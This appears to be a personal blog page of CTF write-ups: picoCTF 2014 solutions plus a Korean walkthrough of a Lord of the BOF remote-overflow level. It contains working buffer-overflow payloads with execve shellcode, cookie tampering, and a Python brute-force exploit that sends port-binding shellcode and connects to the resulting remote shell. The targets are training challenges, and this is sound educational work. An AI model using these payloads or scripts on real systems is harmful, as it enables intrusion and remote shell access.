반응형

Hello! Today I'm going to write simple writeups(without reasonings) to wrap-up what I've solved in the picoctf2014. Please feel free to ask questions for specific problems/reasonings in the comments. Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

Chrome right click, click inspect element;

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and put in for keyword, 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Plug in a few cve's; CVE-2014-1542


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript

click break code! after entering the message.


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, go to inspect elements, open tab on the gridded bit of the website         -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to google images and paste the image's url, hit enter. The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
0x52657663 & 0x30646521 in little endian-" \x63\x76\x65\x52 & \x21\x65\x64\x30". Plug the values into 'data preview' below; \x63\x76\x65\x52\x21\x65\x64\x30; You get the values in ASCII. cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symbolic link the txt file into cow file.


pico19855@shell:~$ cd /home/daedalus

pico19855@shell:/home/daedalus$ ls

flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c

pico19855@shell:/home/daedalus$ ./supercow secret1.cow

 ____________

< cow_text_1 >

 ------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||

pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow

pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow

 ______________

< I_LOV_BNANAS >

 --------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.

Grep it.


pico19855@shell:/home/daedalus$ cd /problems/grepfriend

pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *

daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6

pico19855@shell:/problems/grepfriend$ 



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

alert(key); on your javascript console. (The key differs.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If an integer overflows, it becomes negative.


pico19855@shell:~$ nc vuln2014.picoctf.com 50000

Your number is 1712058. Can you make it negative by adding a positive integer?

2145771590

Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!


Thanks for playing.



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>


unsigned secret = 0xdeadbeef;


int main(int argc, char **argv){

    unsigned *ptr;

    unsigned value;


    char key[33];

    FILE *f;


    printf("Welcome! I will grant you one arbitrary write!\n");

    printf("Where do you want to write to? ");

    scanf("%p", &ptr);

    printf("Okay! What do you want to write there? ");

    scanf("%p", (void **)&value);


    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);

    *ptr = value;

    printf("Value written!\n");


    if (secret == 0x1337beef){

        printf("Woah! You changed my secret!\n");

        printf("I guess this means you get a flag now...\n");


        f = fopen("flag.txt", "r");

        fgets(key, 32, f);

        fclose(f);

        puts(key);


        exit(0);

    }


    printf("My secret is still safe! Sorry.\n");

}

pico19855@shell:/home/write_right$ gdb -q write_right

Reading symbols from write_right...(no debugging symbols found)...done.

(gdb) disas main

Dump of assembler code for function main:

   0x080485cd <+0>: push   %ebp

<cont..>

   0x0804865b <+142>: movl   $0x8048831,(%esp)

   0x08048662 <+149>: call   0x8048470 <puts@plt>

   0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.

   0x0804866c <+159>: cmp    $0x1337beef,%eax

<cont...>

   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>

   0x08048701 <+308>: leave  

   0x08048702 <+309>: ret    

End of assembler dump.

(gdb) x/wx 0x804a03c

0x804a03c <secret>: 0xdeadbeef

(gdb) q

pico19855@shell:/home/write_right$ ./write_right 

Welcome! I will grant you one arbitrary write!

Where do you want to write to? 0x804a03c

Okay! What do you want to write there? 1337beef

Writing 0x1337beef to 0x804a03c...

Value written!

Woah! You changed my secret!

I guess this means you get a flag now...

arbitrary_write_is_always_right

pico19855@shell:/home/write_right$ 



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
void give_shell(){
 gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh -i"); 
}

void vuln(char *input){
char buf[16];
int secret = 0;
strcpy(buf, input);

if (secret == 0xc0deface){
give_shell(); 
}else{
printf("The secret is %x\n", secret); 
}
 

int main(int argc, char **argv){
if (argc > 1)
vuln(argv[1]);
return 0;
}

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl
-e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
You see the url of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python

import sys """ Daedalus Corporation encryption script. """ def xor(input_data, key): result = "" for ch in input_data: result += chr(ord(ch) ^ key) return result def encrypt(input_data, password): key = 0 for ch in password: key ^= ((2 * ord(ch) + 3) & 0xff) return xor(input_data, key) def decrypt(input_data, password): return encrypt(input_data, password) def usage(): print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0]) exit() def main(): if len(sys.argv) < 5: usage() input_data = open(sys.argv[2], 'r').read() result_data = "" if sys.argv[1] == "encrypt": result_data = encrypt(input_data, sys.argv[4]) elif sys.argv[1] == "decrypt": result_data = decrypt(input_data, sys.argv[4]) else: usage() out_file = open(sys.argv[3], 'w') out_file.write(result_data) out_file.close()  

main()

//Actually, I kinda got mixed here, so (i dont remember his name) thanks to the anonymous admin who made this prob. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'


password=[]


def xor(input_data, key):

    result = ""

    for ch in input_data:

        result += chr(ord(ch) ^ key)

    return result


for password in range (0,256):

   result=xor(input_data, password)

   print result + "\n"


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why at&t
I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt
# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm

# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.

MOV $3187,%ebx //ebx=3187 MOV $26953,%eax //eax=26953 MOV $19902,%ecx //ecx=19902 CMP %eax,%ebx //compare eax and ebx JL L1 //Jump to L1 if ebx < eax JMP L2 //else jump to L2

L1: IMUL %eax,%ebx //ebx=eax*ebx, ebx=8539211 ADD %eax,%ebx //ebx+=eax, ebx=85926164 MOV %ebx,%eax //eax=ebx, eax=85926164 SUB %ecx,%eax //eax-=ecx, goto L3, eax=85906262 JMP L3

L2: IMUL %eax,%ebx //ebx=eax*ebx SUB %eax,%ebx //ebx+=eax MOV %ebx,%eax //eax=ebx ADD %ecx,%eax //eax-=ecx

L3: 

NOP



Delicious! - 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension, EditThisCookie. In the cookie value <session_id> is your session stored. Change it to numbers 1~50 (50, I'd recommend,) and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symb
ols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <gi
ve_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl
-e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great             




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memories of solving this (I remember asking about it tho,) I think I had used a more "professional" way when I first solved it but since the password is hardcoded(the hint) I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
______  
_ _ _____
| _ \ | | | | / __ \
| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \
| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) |
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/
| |
|_|
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at/home/no_overflow/ on the shell server. The source can be found here.

How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)


The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.

Don't forget to ulimit -c unlimit in order to make a core file.

pico19855@shell:~$ cat no_overflow.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256
void greet(int length){
char buf[BUFSIZE];
puts("What is your name?");
read(0, buf, length);
printf("Hello, %s\n!", buf);
}
void be_nice_to_people(){
gid_t gid = getegid();
setresgid(gid, gid, gid);
}
int main(int argc, char **argv){
int length;
be_nice_to_people();
puts("How long is your name?");
scanf("%d", &length);
if(length < BUFSIZE) //don't allow buffer overflow
greet(length);
else
puts("Length was too long!");
}

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                                                                    €莽咽œ昶苔ƒ嚆

 

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb) 

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734


0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a

(gdb) q


pico19855@shell:~$ cd /home/no_overflow

pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                       €莽擎|昶苔ƒ嚆

ls

Makefile  core flag.txt  no_overflow  no_overflow.c

cat flag.txt

what_is_your_sign


반응형

'CTF > picoCTF' 카테고리의 다른 글

picoCTF 2018 writeup  (1) 2019.02.05
picoCTF 2014  (6) 2014.11.19
picoCTF 2013  (0) 2014.06.27
  1. BlogIcon EverTokki 2014.11.25 05:34 신고

    Shellcode from: http://shell-storm.org/shellcode/files/shellcode-827.php

  2. dkdkdkdkdkdkdbdbddkdbdb 2015.11.01 09:34

    해킹공부하려면 뭐 먼저 시작해야되나요?

    • BlogIcon EverTokki 2015.11.01 13:56 신고

      c언어를 읽는 방법은 알아야 한다고 생각합니다.
      http://itguru.tistory.com/187 저는 여기 있는 씹어먹는 c언어로 시작했습니다. 그리고 해커스쿨에 찾아보면 다른 강좌들도 많을거에요.

  3. dkdkdkddkdkdkdkkdkdkd 2015.11.08 18:49

    알고리즘같은 프로그래밍에 대해서 먼저 배우라는 말도 들었는데 어떻게 생각하세요?

    • BlogIcon 에버토끼 2015.11.08 19:32

      어떻게 생각하느냐고에 대해 답변을 하자면 사실 배우는 사람 마음이라고 생각합니다. 거기에 흥미가 가시면 알고리즘부터 배우셔도 되고요.

  4. dkdkdkkdkdkdkdk 2015.11.18 11:02

    감사합니다. ㅎㅎㅎ

반응형

올해 DAA 에서 열린 모의유엔에 냈던 country report, position paper(policy statement), resolution입니다.

ECOSOC, UK로 참가했으며, 주제는 Measures to ensure gender equilty in the MENA region과 The question of food and water security in the MENA region이었습니다. 학교에서 조촐하게 하는거라 조사도 많이 안하고 준비도 제대로 안해서 개인 resolution은 없습니다.ㅋㅋ 저 혼자만의 결과물이 아니기 때문에 그냥 참고만 하시기 바랍니다.



ECOSOC-GenderEquality-UK_PositionPaper.docx


Food and Water Scarcity-Resolutions.docx


Gender equity measures-Resolution Qatar, Saudi Arabia, Egypt.doc


GenderEquality-Resolutions.docx


UK_CountryReport.docx


Water and Food UK Saudi Arabia Turkey Singapore.docx





반응형

'ARCHIVE > 학교' 카테고리의 다른 글

AUDMUN2015 후기 [LIVE]  (0) 2015.10.30
[구글인턴] Google Dubai 일주일 체험기  (9) 2015.05.06
DAAMUN 1- United Kingdom  (0) 2014.11.01
[영어]To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[과학]The effect of salt on ice lab report  (0) 2013.12.02
JoMUN 11- Mali  (0) 2013.10.08
반응형

이번에 좀 머리를 쓰긴 했지만 원래 소켓프로그래밍 정말로 해보고싶었던지라 재밌게 클리어 한 것 같습니다.

처음에 제 생각으론 쉘이 따져야할텐데 안 따져서 인터넷을 좀 뒤져봤더니 권한을 어.. 뭐라해야하지 연결한 프로그램한테 바로 주는 것이 아니라 다른 포트에 연결해놔서 listen하고 있게 둔 다음 그 포트로 접속해야 연결이 되게 만든 쉘코드가 바로 port binding shellcode이라네요. 스택 오버플로우에 비슷한 질문이 올라와있어서 포트바인딩 쉘코드를 사용해야 한다는걸 알게 되었습니다. 쉘코드는 http://shell-storm.org/shellcode/files/shellcode-217.php 이곳에서 찾았습니다.



[xavius@localhost xavius]$ cat death_knight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark knight

        - remote BOF

*/


#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <dumpcode.h>


main()

{

        char buffer[40];


        int server_fd, client_fd;

        struct sockaddr_in server_addr;

        struct sockaddr_in client_addr;

        int sin_size;


        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

                perror("socket");

                exit(1);

        }


        server_addr.sin_family = AF_INET;

        server_addr.sin_port = htons(6666);

        server_addr.sin_addr.s_addr = INADDR_ANY;

        bzero(&(server_addr.sin_zero), 8);


        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

                perror("bind");

                exit(1);

        }


        if(listen(server_fd, 10) == -1){

                perror("listen");

                exit(1);

        }


        while(1) {

                sin_size = sizeof(struct sockaddr_in);

                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

                        perror("accept");

                        continue;

                }


                if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }


                close(client_fd);

                while(waitpid(-1,NULL,WNOHANG) > 0);

        }

        close(server_fd);

}

복잡한 코드엔 쥐약인데 보자마자 복잡해 보였습니다ㅋㅋ.... 프로그래밍 공부좀 열심히 해야겠습니다. 

일단 저는 클리어에 목표를 두었기 때문에 perror, 즉 에러메세지를 프린트해주는 부분은 건너뛰었습니다. 그 위의 소스도 소켓을 연결하는 부분이고요.


그렇다면 봐야할 곳은 여기인데

 if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }

여기를 보면 52바이트, 6바이트를 보낸 후 256 바이트를 받는 것을 볼 수 있습니다.

버퍼는 40바이트니, 여기서 버퍼오버플로우가 일어나게 됩니다.


처음에 노가다 했던 코드는 이거인데요,

#!usr/bin/python


from socket import *

import struct, sys


#s = socket(AF_INET, SOCK_STREAM)

payload='\x90'*44 #space


#96 bytes of shellcode

shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"


p = lambda x : struct.pack("<I", x)


#payload= nop 44 ret_addr 4 nop 110 shellcode 96

#s.connect(("192.168.10.129",6666))


print "Connecting.."


for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode


        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)


s.close()


p = lambda x : struct.pack("<I", x) 이부분이 주소값을 리틀엔디안 형식으로 바꿔줍니다.

그냥 페이로드처럼 짰습니다. nop44개, 리턴어드레스, nop 110개, 그리고 쉘코드.

밑의 for address in range는 이제와서 찾아보니 문제 코드에 있는 dumpcode를 활용해 주소를 알아낼 수 있는 방법이 있는 듯하지만 주소값을 얻을 방법이 없는것 같아 막막해서 그냥 주소를 브루트포싱해버렸습니다..

그리고서 페이로드를 보내는 형식이었습니다.

하지만 실행시키면

Death Knight : Not even death can save you from me!


You : 

만 무수히 뜰 뿐, 쉘을 얻을 수가 없었는데, 바인드 한 포트로 접속해야한다는것을 깨달은 뒤 소스를 바꿨습니다.

Administratorui-MacBook-Pro-2:~ EverTokki$ vi exploit_lob.py 


#!usr/bin/python


from socket import *

import struct, sys

import os


#s = socket(AF_INET, SOCK_STREAM)


payload='\x90'*44 #space


#96 bytes of shellcode


shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"


p = lambda x : struct.pack("<I", x)


#payload= nop 44 ret_addr 4 nop 112 shellcode 96

#s.connect(("192.168.10.129",6666))


print "Connecting.."


for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode


        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)


        os.system("telnet 192.168.10.129 31337")

#s.close()


#close connection


그리고서 신기했던건 바로 쉘이 떴다는 것이었습니다. 그리고 그냥 입력은 안되고 command;형식으로 쳐야 전달이 된다는것도요.

Administratorui-MacBook-Pro-2:~ EverTokki$ python exploit_lob.py 

Connecting..

Death Knight : Not even death can save you from me!


You : 

Trying 192.168.10.129...

Connected to 192.168.10.129.

Escape character is '^]'.

ls

: command not found

ls;

bin

boot

dev

etc

home

lib

lost+found

mnt

opt

proc

root

sbin

tmp

usr

var

my-pass;

euid = 520


exit하니 계속 브루트포싱이 돌아가더라고요ㅋㅋ

그 후로 다시 시도해보니 안되디다???

??

???진짜 안되네요 뭐 잘못 건드렸나?

암튼 푸는거 진짜 재밌게 했음..


login: death_knight

Password:

[death_knight@localhost death_knight]$ ls

dropped_item.txt

[death_knight@localhost death_knight]$ cat dropped_item.txt


 You're so great! This is a token to the next gate.


